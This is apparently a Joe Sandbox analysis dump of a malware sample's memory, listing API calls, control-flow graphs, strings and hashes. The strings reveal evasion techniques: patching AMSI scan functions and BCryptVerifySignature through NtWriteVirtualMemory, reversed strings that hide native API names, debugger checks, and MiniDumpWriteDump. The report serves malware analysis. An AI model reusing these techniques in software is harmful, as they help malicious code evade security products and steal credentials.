                                                                                                                • Part of subcall function 02E57A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E57A9F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                              • API String ID: 3386062106-51457883
                                                                                                              • Opcode ID: 36b46be70243d312d62cc4ea23e39c04a91efd2c30b153799ee0c4b07a83f295
                                                                                                              • Instruction ID: 913e9ba3d008b6dcabb3db65a1fc0e1325274bdd775c0e1f4edb0c4f0911e5f1
                                                                                                              • Opcode Fuzzy Hash: 36b46be70243d312d62cc4ea23e39c04a91efd2c30b153799ee0c4b07a83f295
                                                                                                              • Instruction Fuzzy Hash: B8E2F174B901699BDB11FB64EC81BCE73BAAF85300F60E1B2B505AB254DE309E85CF51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 10945 2e45acc-2e45b0d GetModuleFileNameA RegOpenKeyExA 10946 2e45b4f-2e45b92 call 2e45908 RegQueryValueExA 10945->10946 10947 2e45b0f-2e45b2b RegOpenKeyExA 10945->10947 10952 2e45b94-2e45bb0 RegQueryValueExA 10946->10952 10953 2e45bb6-2e45bd0 RegCloseKey 10946->10953 10947->10946 10948 2e45b2d-2e45b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2e45bd8-2e45c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10954 2e45cf2-2e45cf9 10950->10954 10955 2e45c0f-2e45c13 10950->10955 10952->10953 10956 2e45bb2 10952->10956 10958 2e45c15-2e45c19 10955->10958 10959 2e45c1f-2e45c35 lstrlenA 10955->10959 10956->10953 10958->10954 10958->10959 10960 2e45c38-2e45c3b 10959->10960 10961 2e45c47-2e45c4f 10960->10961 10962 2e45c3d-2e45c45 10960->10962 10961->10954 10963 2e45c55-2e45c5a 10961->10963 10962->10961 10964 2e45c37 10962->10964 10965 2e45c84-2e45c86 10963->10965 10966 2e45c5c-2e45c82 lstrcpynA LoadLibraryExA 10963->10966 10964->10960 10965->10954 10967 2e45c88-2e45c8c 10965->10967 10966->10965 10967->10954 10968 2e45c8e-2e45cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10954 10969 2e45cc0-2e45cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10954
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E40000,02E6E790), ref: 02E45AE8
                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E40000,02E6E790), ref: 02E45B06
                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E40000,02E6E790), ref: 02E45B24
                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E45B42
                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E45BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E45B8B
                                                                                                              • RegQueryValueExA.ADVAPI32(?,02E45D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E45BD1,?,80000001), ref: 02E45BA9
                                                                                                              • RegCloseKey.ADVAPI32(?,02E45BD8,00000000,?,?,00000000,02E45BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E45BCB
                                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E45BE8
                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E45BF5
                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E45BFB
                                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E45C26
                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E45C6D
                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E45C7D
                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E45CA5
                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E45CB5
                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E45CDB
                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E45CEB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                              • API String ID: 1759228003-2375825460
                                                                                                              • Opcode ID: fc22dbfb22063e69de4e12155933779b7b2b0e4bdc0f4888274b2719ca59ad49
                                                                                                              • Instruction ID: d9e5bfcfd1697234ed6001967d223ea365e64937c8e4f3f49d5b66096647603c
                                                                                                              • Opcode Fuzzy Hash: fc22dbfb22063e69de4e12155933779b7b2b0e4bdc0f4888274b2719ca59ad49
                                                                                                              • Instruction Fuzzy Hash: 14519771AC025C7BFF21D6A4AC46FEF77AD9B04744F8091A1BA08E6181DF749B848F64

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 13205 2e5894c-2e58971 LoadLibraryW 13206 2e58973-2e5898b GetProcAddress 13205->13206 13207 2e589bb-2e589c1 13205->13207 13208 2e589b0-2e589b6 FreeLibrary 13206->13208 13209 2e5898d-2e589ac call 2e57d78 13206->13209 13208->13207 13209->13208 13212 2e589ae 13209->13212 13212->13208
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,UacScan), ref: 02E58960
                                                                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E5897A
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize), ref: 02E589B6
                                                                                                                • Part of subcall function 02E57D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E57DEC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                                              • API String ID: 1002360270-4067648912
                                                                                                              • Opcode ID: b225a08d47b6e5224bf5128af3c9a32232344cea50772adec1c20f373e76e42e
                                                                                                              • Instruction ID: 783527b9fbbd5fa4024cbd5760d7025a4b27129b71b3f8993b72520f13818552
                                                                                                              • Opcode Fuzzy Hash: b225a08d47b6e5224bf5128af3c9a32232344cea50772adec1c20f373e76e42e
                                                                                                              • Instruction Fuzzy Hash: A2F0AFB1AC03145EE310A7EFA849F57B79C9782715F605979BD1C87140C7751CD28F50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 13222 2e5f744-2e5f75e GetModuleHandleW 13223 2e5f760-2e5f772 GetProcAddress 13222->13223 13224 2e5f78a-2e5f792 13222->13224 13223->13224 13225 2e5f774-2e5f784 CheckRemoteDebuggerPresent 13223->13225 13225->13224 13226 2e5f786 13225->13226 13226->13224
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 02E5F754
                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E5F766
                                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E5F77D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                              • API String ID: 35162468-539270669
                                                                                                              • Opcode ID: a4be1ee71a977a295d568867209256de55fc6f2e5eecb2b6e8da07407612ea14
                                                                                                              • Instruction ID: cfb50de49e4b089bb9334bf8be6b93c978140d49fcc82a6db3833c27b9e6f39c
                                                                                                              • Opcode Fuzzy Hash: a4be1ee71a977a295d568867209256de55fc6f2e5eecb2b6e8da07407612ea14
                                                                                                              • Instruction Fuzzy Hash: 7EF0EC71964258BAEB10A7F88C887DCFBB95B0732CF24D3D0EC35625C1E7710644CA51

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 02E44F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E44F2E
                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E5DE40), ref: 02E5DDAB
                                                                                                              • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E5DE40), ref: 02E5DDDB
                                                                                                              • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E5DDF0
                                                                                                              • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E5DE1C
                                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E5DE25
                                                                                                                • Part of subcall function 02E44C60: SysFreeString.OLEAUT32(02E5F4A4), ref: 02E44C6E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1897104825-0
                                                                                                              • Opcode ID: dca8f343d29966ee1cf0cae2519e3d1e0056f3f91568124458e8dea460921d59
                                                                                                              • Instruction ID: 8486447cacadc3b4b5b1113c87bd61124dc03c0d12f073a61555bcbeb330eda1
                                                                                                              • Opcode Fuzzy Hash: dca8f343d29966ee1cf0cae2519e3d1e0056f3f91568124458e8dea460921d59
                                                                                                              • Instruction Fuzzy Hash: 9E215371B90718BAEB41EAD4DC52FDE77BDEB08700F505461B700F71C0DA70AA448B54

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E5E5F6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CheckConnectionInternet
                                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                              • API String ID: 3847983778-3852638603
                                                                                                              • Opcode ID: b746c06bd091de085295fac820cad89c0d52aa6994f90d903963cfa553dcd9ed
                                                                                                              • Instruction ID: 5fc11ec70997477485e557713e611db2060f4d9a73a8c205e493706a216bfd24
                                                                                                              • Opcode Fuzzy Hash: b746c06bd091de085295fac820cad89c0d52aa6994f90d903963cfa553dcd9ed
                                                                                                              • Instruction Fuzzy Hash: 20415375B901589BEB01EBA4E841FDE73FAEF88700F60D461F540A7680DE70AE018F55
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E44F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E44F2E
                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E5DD5E), ref: 02E5DCCB
                                                                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E5DD05
                                                                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E5DD32
                                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E5DD3B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3764614163-0
                                                                                                              • Opcode ID: 4b938fb1c0d76fd468cb7728d933eb1176fbbf846985004dbbfe1e4abe99d970
                                                                                                              • Instruction ID: 9ea660cd46484b963860db48aa919d12d0b1966863e3bf5a0230735f0c11b99d
                                                                                                              • Opcode Fuzzy Hash: 4b938fb1c0d76fd468cb7728d933eb1176fbbf846985004dbbfe1e4abe99d970
                                                                                                              • Instruction Fuzzy Hash: 25212171B90618BAEB50EAD0DC52FDEB3BDEB05B00F609561B600F71C0DBB06A048B64
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E57A9F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                              • API String ID: 4072585319-445027087
                                                                                                              • Opcode ID: 77dd5883a98e71204f2eb64941f08b299ecb65b6e812b44f22d520ce8b6fd0ae
                                                                                                              • Instruction ID: 8c02ef756e3e49c6f00fd40d33711312c3b8fd8da56edc9b8289fb937b231929
                                                                                                              • Opcode Fuzzy Hash: 77dd5883a98e71204f2eb64941f08b299ecb65b6e812b44f22d520ce8b6fd0ae
                                                                                                              • Instruction Fuzzy Hash: 9A1121756D0208BFEB04DFA4EC41F9EBBADEB48700F519460BD04D7640DA34AA51CF64
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E57A9F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                              • API String ID: 4072585319-445027087
                                                                                                              • Opcode ID: d4a31a5fe7634c622782e6d16aabf769081ef80f4dd376234e381225d84e14cf
                                                                                                              • Instruction ID: 9580389336d29f6b88124f4ae0b0f79ba7a8c90ee2a9202b937b3ed94dac29ce
                                                                                                              • Opcode Fuzzy Hash: d4a31a5fe7634c622782e6d16aabf769081ef80f4dd376234e381225d84e14cf
                                                                                                              • Instruction Fuzzy Hash: FF112D756D0208BFEB04EFA4EC41F9EBBADEB48700F919460BD04D7640DA34AA51CF64
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E58471
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                              • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                              • API String ID: 2521977463-737317276
                                                                                                              • Opcode ID: e11178e019a35da7085080b68604d19d0c2725ab06aef87f72630a7f21973851
                                                                                                              • Instruction ID: 8e75a470bc21a7257071df0026043c246644a4214f214bea99c59a0292bb86cf
                                                                                                              • Opcode Fuzzy Hash: e11178e019a35da7085080b68604d19d0c2725ab06aef87f72630a7f21973851
                                                                                                              • Instruction Fuzzy Hash: 3A012D756D0218AFEB10EFA8EC41E5EBBAEEB49700F519460BD04D7640DA34A951CF24
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E57DEC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
